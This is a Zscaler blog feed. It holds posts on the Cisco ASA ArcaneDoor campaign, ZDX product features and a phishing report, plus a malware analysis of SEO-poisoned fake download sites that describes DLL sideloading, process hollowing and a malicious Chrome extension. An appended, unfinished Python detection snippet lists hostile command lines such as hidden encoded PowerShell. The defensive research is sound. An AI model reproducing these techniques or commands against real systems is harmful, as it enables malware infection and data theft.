Blogs Feed https://www.zscaler.com/ Zscaler Blog — News and views from the leading voice in cloud security.

Cisco ASA Firewall Breach: What to Do When Security Is a Target
https://www.zscaler.com/blogs/product-insights/cisco-asa-firewall-breach-what-do-when-security-target

The Year of the Dragon has seen some notable events so far: a total eclipse, Facebook’s 20th anniversary, and another Taylor Swift streaming record. But 2024 has also become the Year of the Hardware Vulnerability, with multiple VPNs and firewalls suffering zero-day vulnerabilities that bad actors are actively exploiting.

On April 24, Cisco issued a warning that a nation-state supported threat actor had compromised its Adaptive Security Appliances (ASA). ASA integrates a firewall and VPN with other security features. This campaign, known as ArcaneDoor, involved the exploitation of two zero-day vulnerabilities (CVE-2024-20353, CVE-2024-20359) that targeted government networks worldwide. The threat actor deployed two backdoors: Line Dancer allowed them to run custom malware in the memory of network appliances, spy on network traffic, and steal data. Line Runner gave them persistent access to target devices, even after reboots or updates. As of this writing, the initial attack vector is unknown. This hacking campaign may be targeting devices other than the ASA, exploiting other unknown flaws to access and exploit the Cisco ASA vulnerability.

Another day, another CVE

Cisco’s disclosure and warning about the ArcaneDoor hacking campaign comes at a time when critical CVEs have been identified for Ivanti, SonicWall, Fortinet, Palo Alto Networks, and other Cisco VPN solutions. This recurring pattern highlights a concerning trend: threat actors are specifically targeting security appliances like firewalls and VPNs, exploiting their vulnerabilities in an attempt to gain access to the very environments they are designed to protect. These attacks indicate that the issue is not limited to any one vendor. Rather, it is the underlying legacy architecture of the devices that makes them lucrative targets.

Decoding the architectural flaws

The big question on security and network architects’ minds today: why are perimeter-based security and hub-and-spoke network architecture susceptible to attacks?

Decades ago, firewalls and VPNs were vital parts of an organization’s security. Employees mainly worked in offices, there were no smart lights or smart printers, and sophisticated cyberattacks on employees were more fiction than reality. Today’s complex, advanced cyberattacks weren’t yet widespread.

Today's organizations are highly distributed and dynamic. The internet is the corporate network, with users, workloads, and IoT/OT devices connecting from various locations. By design, firewalls and VPNs have public-facing IP addresses that sit on the public internet so authorized users can traverse the web and find the entry points into the organization’s environment. This architectural flaw is where the problem lies: anyone, including threat actors, can discover these entry points. Even more concerning, everything within a traditional network is considered "trusted." This enables threat actors to establish a foothold in the network and move laterally, compromising the entire environment.

How to protect yourself with zero trust security

The best defense against zero-day attacks is to embrace zero trust security. Zero trust architecture is inherently different from traditional architectures that rely on firewalls and VPNs. Based on the principle of least privilege, it minimizes the internal and external attack surface, terminates and fully inspects all connections, and establishes one-to-one connectivity between authenticated users and applications without exposing the enterprise network. An effective zero trust approach drastically reduces the risk of successful exploits as well as the impact of a compromise.

A cloud native, proxy-based zero trust architecture like the Zscaler Zero Trust Exchange:

- Minimizes the attack surface by eliminating firewalls, VPNs, and public-facing IP addresses. It allows no inbound connections and hides applications behind a zero trust cloud.
- Stops compromise by inspecting all traffic, including encrypted traffic, at scale. This enables policy enforcement and real-time threat prevention.
- Eliminates lateral threat movement by connecting entities to individual IT resources instead of the entire network.
- Blocks data loss by enforcing policies across all potential leakage paths, including encrypted traffic. This ensures the protection of data in motion, at rest, and in use.

Best practices to protect against zero-day attacks

The Zscaler ThreatLabz research team recommends these best practices to protect your organization against exploits:

- Minimize the attack surface. Make applications (including vulnerable VPNs) invisible to the internet, ensuring that attackers cannot gain initial access.
- Prevent initial compromise. Inspect all traffic inline to automatically stop zero-day exploits, malware, or other sophisticated threats.
- Enforce least-privileged access. Restrict permissions for users, traffic, systems, and applications with identity and context, ensuring only authorized users can access named resources.
- Block unauthorized access. Use strong multifactor authentication (MFA) to validate user access requests.
- Eliminate lateral movement. Connect users directly to applications, not the network, to limit the blast radius of a potential incident.
- Shut down compromised users and insider threats. Enable inline inspection and monitoring to detect compromised users with access to your network, private apps, and data.
- Stop data loss. Inspect data in motion and at rest to prevent active data theft during an attack.
- Deploy active defenses. Use deception technology with decoys, and perform daily threat hunting to derail and stop attacks in real time.
- Test your security posture. Obtain regular third-party risk assessments and conduct purple team activities to identify and fix gaps in your security. Ask your service providers and technology partners to do the same, and share findings with your security team.

The road ahead

The increased targeting of VPNs and firewalls by threat actors highlights the flaws of traditional perimeter-based architectures. With lucrative gains to be had, these attacks will continue. Organizations must prioritize patching critical vulnerabilities as soon as possible. However, to truly stay ahead of zero-day attacks, adopting zero trust is the most effective approach. A zero trust architecture will enable organizations to minimize the attack surface, enforce strict access controls, and continuously monitor and authenticate users and devices. This proactive approach to security will help mitigate zero-day risks and ensure a more robust, resilient defense in the future.

References

https://www.wired.com/story/arcanedoor-cyberspies-hacked-cisco-firewalls-to-access-government-networks/
https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/

If you’re concerned about how these vulnerabilities could affect your organization, contact us at [email protected] for a free external attack surface assessment as well as an expert consultation on how you can migrate from legacy architectures to zero trust.

Fri, 26 Apr 2024 10:16:35 -0700 Apoorva Ravikrishnan https://www.zscaler.com/blogs/product-insights/cisco-asa-firewall-breach-what-do-when-security-target

Step Into the Future of ZDX with 3 Exciting New Features: ZDX Copilot, Data Explorer, and Hosted Monitoring!
https://www.zscaler.com/blogs/product-insights/step-future-zdx-3-exciting-new-features-zdx-copilot-data-explorer-and-hosted

Many organizations face challenges supporting a distributed workforce, and pressure on IT resources continues to increase.
Zscaler is relentlessly focused on enhancing our Digital Experience platform to empower IT operations and service desk teams to deliver the best end user experiences for their distributed workforces. Not long ago, we announced an ML-based Root Cause Analysis feature that helps IT teams quickly discover the root cause of issues. Using AI and ML for precise issue detection and root-cause analysis helps teams swiftly resolve support tickets by reducing mean time to resolution (MTTR) and mean time to detection (MTTD). We’re very excited to introduce three new advancements that will further assist IT teams in improving efficiency, visibility, and collaboration across IT operations, service desk, and security teams.

ZDX Copilot: Revolutionizing IT Operations with AI

The ZDX Copilot is an AI-driven virtual assistant designed to simplify and enhance IT operations through an advanced conversational interface. By integrating AI into the core of our network operations tools, ZDX Copilot allows users to interact with their systems using natural language. ZDX Copilot taps into the power of pre-trained LLMs to provide a conversational interface and interpret questions within the context of ZDX.

“Show me the user experience for Hiren”

Copilot links symptoms (e.g., network drops) to potential causes (Wi-Fi issues, network latency, etc.) and leverages historical data to enable accurate diagnostics. The large language model (LLM) uses input from time series data like the web probes, CloudPath probes, device events, process stats, and hundreds of other time-series metrics to help with the analysis.

How It Works

The IT admin initiates the conversation with the Copilot: "Could you please look at this user and find out the root cause of the bad score?" The LLM then collaboratively examines the data from various angles, asks clarifying questions if needed, and provides its analysis.

Copilot Workflow

1. Initiated Query: An IT admin starts the analysis by asking the LLM (in natural language) to analyze a particular data point. For instance, "Why is John Doe having poor sharepoint experience?"
2. Automated Data Retrieval: The system fetches the data pertaining to the query (in this case for the specific user John Doe) and presents it to the LLM.
3. Analysis by LLM: The LLM processes the data and provides the output/analysis to the ZDX admin.
4. Drill Down: The admin can further ask the LLM to drill down into specifics. For example, "Tell me more about the network slowness observed.”

Here are a few examples of the types of questions a ZDX admin could ask the Copilot:

- "Which users are having a poor Wi-Fi experience?"
- "Show me John Doe’s CPU utilization"
- “Troubleshoot the user experience for Linda Lucas”

Let’s go through an example: I am asking ZDX Copilot to troubleshoot my user experience: “Troubleshoot Vikas Srivastava’s experience for the last 24 hours”

Since in this case I have two devices, Copilot asks me which device I would like to run the troubleshooting for. After that, it fetches the data from ZDX and provides a detailed analysis of the user experience for me and outlines possible causes that could be impacting my ZDX score.

From here, I went to the ZDX user details page to search for the issue impacting my Wi-Fi. In doing so, I can validate what Copilot told me about my Wi-Fi and take remedial actions.

Now take a step back and think about how little time it took me to merely ask a question in a conversational manner to Copilot and get to the root cause of the problem. The amount of time ZDX could save for your IT teams and helpdesk is substantial. Take a look at this analysis we did on the financial savings it could provide to you:
https://info.zscaler.com/resources-white-papers-calculating-the-financial-value-of-zdx

ZDX Hosted Monitoring: Continuous Network Performance Monitoring

Expanding on our robust monitoring solutions, Zscaler Hosted Monitoring offers a service that operates continuously across multiple vantage points worldwide. This feature is designed to monitor and benchmark network performance, providing a seamless, comprehensive overview of your network's health and activity.

Figure: Zscaler Hosted Monitoring

The Zscaler Zero Trust Exchange is distributed across more than 150 data centers on six continents, enabling users to access services securely from any device, any location, and over any network. You can now monitor the performance of your business-critical and customer-facing services 24/7 from these locations. With this continuous monitoring, you can apply:

- Application availability monitoring: Ensure that your external applications perform at their best, no matter where your customers are located
- Circuit monitoring: Ensure SLAs for applications and services you purchase from SaaS, cloud, data center, or network providers
- Performance monitoring: Confidently roll out new applications or expand into new regions as your business grows organically or by M&A

Vantage Point: a geographical location from which monitoring probes originate. At launch, the available vantage point locations include:

- San Jose
- Washington DC
- Chicago
- Frankfurt
- Zurich
- Amsterdam

With more to be added in the future, these strategic locations ensure that Zscaler Hosted Monitoring covers a broad spectrum of the network landscape, offering diverse insights into global network performance.

Getting started with Hosted Monitoring is straightforward.

Collections: Under the Configuration section of ZDX Hosted Probes, we have Collections, a grouping mechanism for the probes you would configure for the monitored destinations. For example, you could have a collection dedicated to mission-critical applications, one for HR, another one for Finance, etc.

Figure: Hosted Monitoring Configuration

Looking at the Metrics

From the Zscaler Hosted Monitoring dashboard, you can analyze the time-series data collected from various vantage points. You can even select a specific vantage point of interest and see the metrics from that vantage point’s perspective.

Figure: Zscaler Hosted Monitoring Dashboard

Once you select a data point on the scatter plot, you get detailed insights like DNS response times, TCP connect times, SSL handshake times, server response time, time to last byte (TTLB), page fetch time (PFT), the time series data for the web, and CloudPath along with specifics for the probe data like DNS response times. From the waterfall details below, you can see exactly the time distribution of the different measured metrics (page fetch time, SSL handshake time, etc.) and easily understand which attribute of the page load is taking the most time.

Figure: Zscaler Hosted Monitoring Metrics

Now let's look at the CloudPath data. Below are all the ISP paths detected to the configured destination (on different DNS resolutions). You can see the ISP information and the latency between hops to quickly pinpoint bottlenecks (highlighted in yellow).

ZDX Data Explorer: Advanced Data Querying and Reporting

ZDX Data Explorer is a sophisticated tool that enables detailed data analysis and reporting. Users can customize queries and generate reports based on various selectable fields such as applications, metrics, and grouping or aggregation preferences. This flexibility supports a detailed examination of data to uncover operational insights and trends.

While building your query, you can select the Applications you are interested in and the specific metrics you would like to report on, such as:

- ZDX Score
- Device Count
- User Count
- DNS Time
- Page Fetch Time
- Web Request Availability
- Latency
- Packet Count
- Packet Loss
- Number of Hops

You can group these by Applications, Zscaler Locations, Geolocations, and Departments.

Data Explorer is valuable for engineers and managers:

- Engineers can troubleshoot problems by comparing similar services or applications to expose differences and anomalies across time.
- Managers and leaders can analyze trends that show how the team has achieved their KPIs, or uncover areas for optimization.

Conclusion

With these new capabilities, your teams can rely on Copilot as their AI assistant to ask and get answers to all your app, network, and device performance questions; use Hosted Monitoring to ensure that no customer or employee suffers from a poor digital experience; and visualize trends with Data Explorer to troubleshoot issues or to quantify IT’s contributions to optimizing digital experience, and, thereby, improve business results.

To learn more about these innovations, watch our webinar, sign up for a demo, and review the latest features today!

Thu, 25 Apr 2024 04:26:01 -0700 Vikas Srivastava https://www.zscaler.com/blogs/product-insights/step-future-zdx-3-exciting-new-features-zdx-copilot-data-explorer-and-hosted

Americas Executive Partner Summit Recap
https://www.zscaler.com/blogs/company-news/ams-executive-partner-summit-recap

After hosting more than 100 partner executives at our Zscaler Executive Partner Summit, we are going into this week feeling both immensely grateful and highly energized. Time is our most valuable asset, and having the opportunity to engage with so many of our partner leaders from across the Americas was a humbling and inspiring experience.
During the two-day summit, we showcased to our partner executives the ongoing strategic investments that Zscaler is making in our Partner Ecosystem and how we can help them continue to grow and accelerate their business with us. Our internal teams have certainly experienced the momentum and vision that we have for our Partner Ecosystem. Being able to host senior executives from our most strategic partners to share that vision with them, experience the excitement together for the opportunity that lies ahead, and discuss the momentous milestones that we’ll soon conquer together truly ignites our teams as we propel towards our joint mission and goals.

As Zscaler continues to grow and evolve on our journey to $5 billion ARR, we’ve welcomed many new leaders across our global organization. With their experience, talent, and fresh perspectives, we’re accelerating like never before. At the same time, our focus on partners has never been stronger—we’re implementing new, elevated strategies that will unlock growth opportunities for our partners, forging greater partner alignment, innovation, and unprecedented business momentum. From global partner engineering and M&A to customer success, business development, sales, and beyond, every corner of Zscaler is investing in and aligning on partner success in new, dedicated ways. Our goal is to ensure that as Zscaler grows and succeeds, our partners excel alongside us.

Beyond the executive presentations, technical breakout sessions, and impactful 1:1 meetings throughout the summit, we couldn't miss an opportunity to properly celebrate everything our partners have accomplished this year. We celebrated their achievements and successes in a night of Yacht Rock, sailing the night away with live music, dinner, and discussions as we looked towards our exciting journey together in our next phase of monumental growth.

Reflecting on the event, we are filled with gratitude and confidence in what lies ahead for our partner organization. We are fortunate to work with some of the greatest leaders and partner organizations in the world. It’s exciting to welcome amazing new leaders as we continue to make smart investments in partner success, delivering predictability and more opportunities than ever before for our Zscaler partners to win alongside us.

Want to experience the excitement and energy at this year’s Partner Summit? Check out the complete recap video above!

Thu, 25 Apr 2024 10:35:51 -0700 Karl Soderlund https://www.zscaler.com/blogs/company-news/ams-executive-partner-summit-recap

Zscaler Digital Experience Just Got Smarter And Wiser: Introducing a New AI Assistant, More Telemetry, and Custom Insights
https://www.zscaler.com/blogs/company-news/zscaler-digital-experience-just-got-smarter-and-wiser-introducing-new-ai

Businesses rely on technology to keep employees productive - organizations with 250+ employees use more than 100 SaaS apps, and today’s end users expect flawless digital experiences when interacting with customer support, placing orders, or using online services. IT teams are the bedrock of these businesses, keeping their technology running smoothly. They must ensure that all networks, applications, and services - even those that they don't control - are always on and reliable.

To this end, Zscaler is excited to introduce three new advancements that will significantly help IT teams improve efficiency, visibility, and collaboration across IT operations, service desk, and security teams.

- Copilot is an AI Assistant that leverages cutting-edge generative AI to answer all your app, network, and device performance questions, and offer domain-specific expertise.
- Hosted Monitoring enables you to continuously monitor applications and services from Zscaler-hosted, globally distributed locations to help you ensure that no customer or employee suffers from poor digital experiences.
- Data Explorer enables you to easily build and share customized reports that visually correlate data drawn from diverse datasets for uses ranging from troubleshooting to demonstrating IT’s impact on business performance.

To learn more about these innovations, read on and watch the launch webinar where we dive deeper into these capabilities, why they are important for IT and security teams, and how you can use them.

Introducing ZDX Copilot: Your AI-powered Assistant

Unlike endpoint and network monitoring tools, Zscaler Digital Experience (ZDX) gathers performance metrics from 500T daily signals and 390B daily transactions across end user devices, networks, and applications. This simplifies your monitoring stack with a consolidated view and makes it easier to detect and fix performance issues.

IT teams have to grapple with vast amounts of performance data across devices, networks, and applications. So, in May 2023, we introduced AI-powered problem detection and root cause analysis to help them accurately detect performance anomalies that can impact digital experience and make it significantly easier to isolate the root cause of issues, fix them quickly, and put employees back to work faster. Today, ZDX Copilot takes us a step further.

ZDX Copilot, your AI assistant, unlocks productivity for IT teams by empowering them to get the information they need using a simple sequence of questions. Teams across IT and security benefit from using Copilot:

- Service desk teams can isolate the root cause of user complaints to efficiently triage tickets and collaborate with other teams; they can also easily look up technical information.
- Networking teams can conversationally perform deep analysis across networks, applications, and regions to identify trends or find opportunities for optimization.
- Security teams can ensure that their services are performing at all times, as well as instantly expose the root cause of issues and affected parties when performance lags.
- IT leaders can conveniently extract and present digital experience trends and performance insights to show progress or identify new opportunities.

ZDX Copilot is versatile and can be used in many ways: IT employees across functions can upskill themselves, automate tasks, draw digital experience insights, and perform deep analysis.

Continuously Monitor Customer-Facing and Business-Critical Web Applications with the All-New Hosted Monitoring

Earlier this year, Microsoft had connectivity issues impacting Azure, Teams, Outlook, and SharePoint for 90 minutes. Square had a DNS configuration issue, and its customers were unable to process transactions for more than 18 hours. You have likely heard about these outages, but these are only two of many more that happened. ISP, cloud service, and SaaS issues can have an enormous impact on employee productivity, customer experiences, and business performance. This is why it’s important to extend our monitoring strategy to all ISPs, applications, and services that our employees and customers across all locations rely on to connect to our business and customer-facing applications.

With Zscaler Digital Experience Hosted Monitoring, you can monitor applications, such as an eCommerce website, from every region your customers are in. The Zscaler Zero Trust Exchange is distributed across more than 150 data centers on six continents, which enables users to access services securely from any device, any location, over any network. You can now continuously monitor performance of your business-critical and customer-facing applications and services from several of these locations. With continuous monitoring, you can:

- Ensure that your external websites perform at their best, no matter where your customers are located
- Monitor SLA compliance for applications and services you purchase from SaaS, cloud, datacenter, or network providers
- Confidently roll out new applications or expand into new regions as your business grows, whether organically or through M&A

To learn more about how you can maximize your impact using hosted monitoring, review this eBook.

Analyze Your Data Your Way with Data Explorer

Finally, ZDX has made it incredibly easy to gather trends and insights that are relevant to you, your team, and your business. With the new Data Explorer you simply select your applications, pick the metrics that you’d like to analyze, choose how to organize and manipulate your data, and pick the widgets with which you can visualize the results. Data Explorer provides value for engineers and managers in the following ways:

- Engineers can troubleshoot problems by comparing similar services or applications to expose differences and anomalies across time
- Managers and leaders can analyze trends that show how their team achieves their KPIs or uncover areas for optimization

How to Unlock These Capabilities

ZDX Copilot and Hosted Monitoring are available with ZDX Advanced Plus, while Data Explorer is available with ZDX Advanced and ZDX Advanced Plus. For a closer look at the various versions of ZDX, please review this comparison.

Your Next Steps

With these new advancements, ZDX provides richer network and app telemetry, helping everyone in IT perform their tasks with maximum efficiency. Copilot, Hosted Monitoring, and Data Explorer give IT teams instant access to massive knowledge repositories using GenAI, so team members can upskill themselves and work collaboratively with speed and accuracy. To learn more about these innovations, watch our webinar, or request a demo.

Thu, 25 Apr 2024 03:00:01 -0700 Krishnan Badrinarayanan https://www.zscaler.com/blogs/company-news/zscaler-digital-experience-just-got-smarter-and-wiser-introducing-new-ai

Phishing Attacks Rise 58% in the Year of AI: ThreatLabz 2024 Phishing Report
https://www.zscaler.com/blogs/security-research/phishing-attacks-rise-58-year-ai-threatlabz-2024-phishing-report

Phishing threats have reached unprecedented levels of sophistication in the past year, driven by the proliferation of generative AI tools. Transforming how cybercriminals operate, AI advancements are revolutionizing and reshaping the phishing threat landscape. Moreover, this technology has democratized the ability to orchestrate intricate phishing campaigns, making it easier than ever for even beginners to conduct complex and believable phishing attacks. Specifically, this observed shift is enabling novice cybercriminals to launch highly convincing, personalized scams with ease. As a result, organizations now face a myriad of new challenges in protecting their data and systems from the increasing onslaught of phishing attacks.

In response, the Zscaler ThreatLabz team has released the 2024 Phishing Report. This report analyzes over 2 billion phishing transactions from 2023, found within the Zscaler cloud, to equip organizations with a clear understanding of the rapidly evolving phishing landscape. Providing insights into the latest trends and tactics used by cybercriminals, the report highlights active phishing campaigns, exposes emerging schemes, and identifies top targets by region, industry, imitated brand, and more.
Showcasing real-world examples, ThreatLabz phishing findings underscore the importance of applying constant vigilance and zero trust security strategies. The guidance offered aims to help organizations strengthen their defenses against these evolving phishing techniques.Download the Zscaler ThreatLabz 2024 Phishing Report to gain the knowledge needed to proactively combat the rising wave of new phishing threats. 6 key phishing findingsThe following findings represent a subset of key phishing trend discoveries that shed light on the evolution of phishing tactics. Top phishing trends Phishing attacks surged by 58.2% in 2023 compared to the previous year, reflecting the growing sophistication and reach of threat actors. Voice phishing (vishing) and deepfake phishing attacks are on the rise as attackers harness generative AI tools to amplify their social engineering tactics. Adversary-in-the-middle (AiTM) phishing attacks persist and browser-in-the-browser (BiTB) attacks are emerging as a growing threat. Top phishing targets The US, UK, India, Canada, and Germany were the top five countries targeted by phishing attacks. The finance and insurance industry faced 27.8% of overall phishing attacks, marking the highest concentration among industries and a 393% year-over-year increase. Microsoft remains the most frequently imitated brand, with 43.1% of phishing attempts targeting it. Discover further insights into each of these findings and more in the report. Spotlight on AI-enabled phishing threatsGenAI has undoubtedly proven transformative in turning up productivity across businesses. Yet on the flip side of this transformation is a perilous truth: AI is also turning novice to average threat actors into skilled social engineers and sophisticated phishing attackers.By automating and personalizing various components of the attack process, AI speeds up and refines phishing attacks, making them more sophisticated and difficult to detect. 
GenAI quickly analyzes public data, such as information about organizations and executives, saving time in reconnaissance for threat actors and enabling more precise targeted attacks. LLM chatbots craft accurate, believable phishing communications and emails by eliminating misspellings and grammar mistakes. GenAI can swiftly generate convincing phishing pages. The ThreatLabz report showcases how ChatGPT created a phishing login page in less than 10 prompts, and provides key indicators to look out for when identifying a phishing page. AI has blurred the line between authentic and fraudulent content, making it all the more challenging to discern phishing schemes from legitimate web pages and digital communication.As ThreatLabz researchers tracked phishing trends throughout 2023, several notable advanced AI tactics also emerged. Among these were the rise of vishing and deepfake phishing, increasingly favored social engineering tactics that use AI-powered impersonation tools. Vishing insightsAdvanced vishing campaigns are gaining popularity globally, leading to substantial financial losses in some cases. In a notable attempt that ThreatLabz thwarted during the summer of 2023, phishing attackers used AI technology to perpetrate a vishing attack by impersonating Zscaler CEO Jay Chaudhry. The report details the sequence of events, serving as a critical reminder for enterprises and employees to stay vigilant against vishing scammers. ThreatLabz anticipates a continued surge in targeted voice phishing campaigns led by groups like Scattered Spider in the next year. As these efforts aim to acquire employee login credentials, it is imperative for organizations to fortify their phishing defenses to prevent unauthorized access and exploitation. Deepfake insightsPhishing attacks involving deepfakes will be one of the most challenging AI-driven cyberthreats. 
Threat actors now possess the ability to create video content that precisely and accurately replicates faces, voices, and mannerisms. This manipulation has already manifested in concerning ways, such as in the electoral process, where deepfake videos fabricate false narratives or statements from political figures. These videos can sway public opinion, disseminate disinformation, and erode trust in the integrity of the electoral process. As society becomes more and more reliant on digital communication and media consumption, the potential political and life-altering ramifications of deepfake scams will likely extend far beyond the scope of current applications. From financial scams to corporate espionage, the use of deepfake technology poses a significant threat to organizations, individuals, and society at large.Additionally, ThreatLabz observed a rise in QR code scams, recruitment scams, browser-in-the-browser (BitB) attacks, and adversary-in-the-middle (AiTM) attacks. Learn more about each of these schemes in the report. Mitigate phishing risk with zero trustGiven the concerning threat landscape uncovered by this year’s report, how can organizations protect against the latest phishing threats? One definitive solution lies in establishing a foundation of a zero trust architecture. 
Adapting security strategies to combat new phishing trends and mitigate associated risks is crucial—and zero trust is a proven strategy.

The Zscaler ThreatLabz 2024 Phishing Report provides essential guidance to this end, including:

- Fighting AI with AI: Learn about Zscaler’s AI-powered phishing prevention capabilities needed to combat AI-driven threats, including preventing browser exploitation from phishing pages with Zscaler Browser Isolation.
- Zero trust architecture advantages: Learn how the Zscaler Zero Trust Exchange prevents traditional and AI-driven phishing at multiple stages of the attack chain:
  - Prevent compromise: TLS/SSL inspection at scale, AI-powered browser isolation and policy-driven access controls prevent access to suspicious websites.
  - Eliminate lateral movement: Users connect directly to applications, not the network, while AI-powered app segmentation limits the blast radius of a potential incident.
  - Shut down compromised users and insider threats: Inline inspection prevents private application exploit attempts, and integrated deception capabilities detect the most sophisticated attackers.
  - Stop data loss: Inspection of data in-motion and at-rest prevents potential theft by an active attacker.
- Foundational security best practices: Learn fundamental security best practices to enhance overall resilience to phishing attacks.

Download your copy of the Zscaler ThreatLabz 2024 Phishing Report today.

Phishing attacks will persist and remain a pervasive threat to organizations. By understanding the latest phishing trends, assessing the associated risks, and recognizing the implications of AI-driven attacks, your organization will be better equipped to defend against phishing in 2024 and beyond.
Tue, 23 Apr 2024 08:17:50 -0700 Deepen Desai https://www.zscaler.com/blogs/security-research/phishing-attacks-rise-58-year-ai-threatlabz-2024-phishing-report

Black Hat SEO Leveraged to Distribute Malware https://www.zscaler.com/blogs/security-research/black-hat-seo-leveraged-distribute-malware

Introduction

Zscaler ThreatLabz researchers recently encountered a significant number of websites associated with fraudulent activities being hosted on popular web hosting and blogging platforms. Threat actors intentionally create these sites to spread malware by using the proliferation of web hosting platforms to manipulate search engine results – something called SEO poisoning, a subset of Black Hat SEO techniques. This catapults their fraudulent site to the top of a user's search results, increasing the likelihood of inadvertently selecting a malicious site and potentially infecting their system with malware. These sites don't belong to any specific category, as they encompass a wide range of interests such as pirated software, gaming, traveling, and food recipes. The broad coverage seems aimed at further ensuring their visibility in internet search results.

In this blog, we delve into the tactics employed by threat actors to distribute malicious information stealers, and evade detection using obfuscation and anti-debugging techniques.

Key Takeaways

- Threat actors utilize fraudulent websites hosted on popular legitimate platforms to spread malware and steal data.
- To evade detection, attackers employ obfuscation methods and checks on referral URLs. They redirect users based on whether users access the site directly or through a search engine.
- Malicious payloads are delivered through multi-level zipped files, often hidden within seemingly innocuous content. Users may unknowingly execute these payloads during software installations.
- Once executed, malicious DLLs and scripts perform activities such as process hollowing, DLL sideloading, and executing PowerShell commands to download additional malware and initiate communication with command-and-control (C2) servers.
- The malware gathers extensive data including system information, browser data, credentials, and browsing history. It also monitors emails pertaining to cryptocurrency exchanges and possesses the capability to modify email content, as well as potentially steal one-time authentication codes.

Looks Can Be Deceiving

The screenshot below is an example of a fraudulent website being hosted on Weebly that could appear in Google search results when users perform related searches. Even though the webpage appears legitimate and has a “Powered by Weebly” label, it’s actually dangerous. This combination of seeming authentic and being associated with Weebly, a real and reputable platform, makes it more likely that users will download malware without realizing it.

Figure 1: An example of a scam website hosted on Weebly.

How It Works

The sequence begins with threat actors creating a fake site on a web hosting service, which remains undetected by the hosting service itself. When a user searches for relevant information and clicks on a link from the search results, they unknowingly access the malicious site. Interestingly, if the user directly enters the URL instead of clicking on the link, it bypasses this interaction, potentially to avoid analysis by security researchers – a topic further explored in the next section.

Evasion techniques

Threat actors employ checks on these malicious sites designed to evade detection by researchers. Upon loading, they verify the referral URL. If it originates from search engines like Google, Bing, DuckDuckGo, Yahoo, or AOL, the site proceeds to the next page. If the user accesses the website directly, indicating potential analysis, the site avoids redirection.
The following screenshot showcases an obfuscated script which checks and redirects users accordingly.

Figure 2: The obfuscated code responsible for checking and redirecting users to evade detection.

This obfuscation method employs string concatenation and mathematical manipulation to hide the code's logic. It combines strings or arrays to create expressions and manipulates values through mathematical operations to make the code more difficult to understand. The screenshot below shows the decoded JavaScript code that’s hidden in the heavily obfuscated code mentioned above.

Figure 3: The decoded JavaScript code hidden in the heavily obfuscated code.

Payload delivery

Consider a scenario where a user searches for a cracked version of software on a search engine. One of these malicious websites may prominently feature in search results, where the user proceeds to select one. Once the above-mentioned script confirms that the user landed on the page through a search engine, it displays a fake MediaFire page hosted on Weebly.com that appears legitimate. However, instead of cracked software, the user may inadvertently download malware, thus initiating the malicious payload delivery. As an example, the figure below shows a comparison of a fraudulent and legitimate MediaFire page. Both pages are similar; however, examining the URL provides clear indications that one of them is fraudulent because it does not use the MediaFire domain.

Figure 4: A comparison of a fake and legitimate MediaFire page.

The payload file downloaded from the fake MediaFire page has a two-level zipped structure. Upon extracting the first ZIP archive, the victim will find another ZIP archive inside. This secondary ZIP archive is password-protected and the password is located in an image inside the first ZIP archive. This represents the second technique employed by attackers to evade detection. The screenshot below depicts the two-level zipped structure.
Figure 5: The files after extracting two ZIP archives.

Upon executing the extracted setup.exe file, the installation process initiates. This setup file will install the genuine GNU Privacy Guard, an OpenPGP cryptographic software suite widely utilized to enhance the security of email communications. During the installation process, we have observed that alongside setting up the genuine GNU Privacy Guard (GPG), a malicious DLL is also dropped into the same directory. This DLL utilizes DLL sideloading techniques to execute malicious activities under the guise of legitimate processes. The screenshot below shows the malicious DLL within the directory.

Figure 6: A screenshot of the malicious DLL libgcrypt-20.dll loaded using DLL sideloading.

Subsequently, this malicious DLL begins executing its activities. To evade detection, it triggers the execution of explorer.exe and utilizes process hollowing techniques. Below, we outline the steps involved in the process. The attacker exploits an undocumented API, CreateProcessInternalA, to initiate a suspended explorer.exe process, then utilizes NtQueryInformationProcess to acquire its base address. After replacing legitimate content with the malicious payload via NtUnmapViewOfSection, VirtualAllocEx allocates memory within the target process. WriteProcessMemory copies the payload, and ResumeThread resumes execution, completing the injection process.

Furthermore, explorer.exe will initiate the execution of the PowerShell executable, passing along a malicious command-line argument, -windowstyle hidden, to the PowerShell console. The screenshot below shows the decoded version of this command-line argument. This command-line instructs PowerShell to download a heavily obfuscated script from a specified URL. Subsequently, it replaces certain special characters with alphabetical characters. The resulting string is decoded using the FromBase64String method. The decoded Base64 string undergoes XOR operations with the values 167 and 18.
The screenshot below shows the malicious command-line argument.

Figure 7: The malicious command-line argument.

The screenshot below depicts a section of the Base64-encoded file retrieved from the URL provided. This special character replacement prior to decoding is specifically designed to evade detection by antivirus software, enhancing the malware's ability to bypass security measures effectively.

Figure 8: The malicious Base64-encoded file with special character replacement.

This file exhibits multilayered obfuscation. After undergoing the initial level of deobfuscation, certain parts of the script remain obfuscated. Additionally, there are segments of code included within the script responsible for deobfuscating these encoded portions. The screenshot below shows the second level of deobfuscation.

Figure 9: The second level of deobfuscation.

The obfuscated script primarily consists of JavaScript files related to a malicious browser extension. Upon execution, PowerShell will drop multiple files into the directory at C:\Users\{username}\AppData\Local\Default\ and create a browser shortcut on the user’s Desktop. The target path for this shortcut will point to the malicious browser extension: "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\test\AppData\Local\Default". The --load-extension flag is a command-line option used with certain web browsers; it loads extensions into the browser at startup. The screenshot below shows the files associated with the browser extensions.

Figure 10: Files related to the browser extensions.

The screenshot below shows the manifest.json file associated with this malicious extension. The file includes:

- The list of permissions required by the browser extension.
- Numerous JavaScript files, all of which are heavily obfuscated.
- An attempt to disguise the extension as a Google Drive extension.

Figure 11: The manifest.json related to the extension.
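Detection logic for three of the host-side behaviours this analysis describes (a hidden-window PowerShell spawned by explorer.exe, rundll32.exe running a DLL from a user-writable directory, and Chrome started with --load-extension), as an added example that is not code from the blog; the events, paths, user name and encoded payload are constructed Sysmon-style records.

```python
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]

# Constructed Sysmon-style process-creation records for this example; they are
# not logs from the campaign, and the user, paths and payload are placeholders.
SAMPLE_EVENTS: List[Event] = [
    {"id": "e1", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -windowstyle hidden -enc <placeholder-base64>"},
    {"id": "e2", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
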